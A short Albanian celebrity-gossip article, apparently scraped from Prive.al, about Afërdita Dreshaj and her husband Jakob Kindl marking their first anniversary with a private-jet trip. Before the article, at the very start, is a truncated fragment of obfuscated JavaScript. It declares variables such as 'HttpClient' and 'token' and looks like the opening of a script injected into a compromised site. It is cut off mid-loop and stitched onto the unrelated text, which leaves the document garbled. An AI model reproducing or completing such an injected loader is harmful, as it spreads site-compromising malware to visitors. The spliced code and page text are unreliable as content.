;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Një vit martesë, ja surpriza që rezervoi bashkëshorti për Afërdita Dreshaj

By

Afërdita Dreshaj dhe bashkëshorti i saj hokeisti çek Jakob Kindl sapo mbushën një vit martesë, po që ata të dy ende po jetojnë atë fazën e “muajit të mjaltit”.

Nuk është e rrallë që Afërdita të zgjohet me një dhuratë te koka, apo të futet në një shtëpi plot me lule, ose Jacob ta përshëndesë me një buqetë lulesh kur hyn në shtëpi. Ajo asnjëherë nuk denjon të ndajë edhe me ndjekësit e saj mirënjohjen që ka për bashkëshortin shumë romantik dhe të kujdesshëm.

E për përvjetorin e parë të martesës, Jacob i cili po mban rekord si bashkëshorti i surprizave, rezervoi një tjetër surprizë për gruan e tij.

Dyshja janë nisur në pushimet e ëndrrave, për të festuar përvjetorin e parë të martesës dhe atë me avion privat!

Brenda avionit Afërdita u prit me shampanjë, dhurata dhe lule! /Prive.al

Artikuj të ngjashëm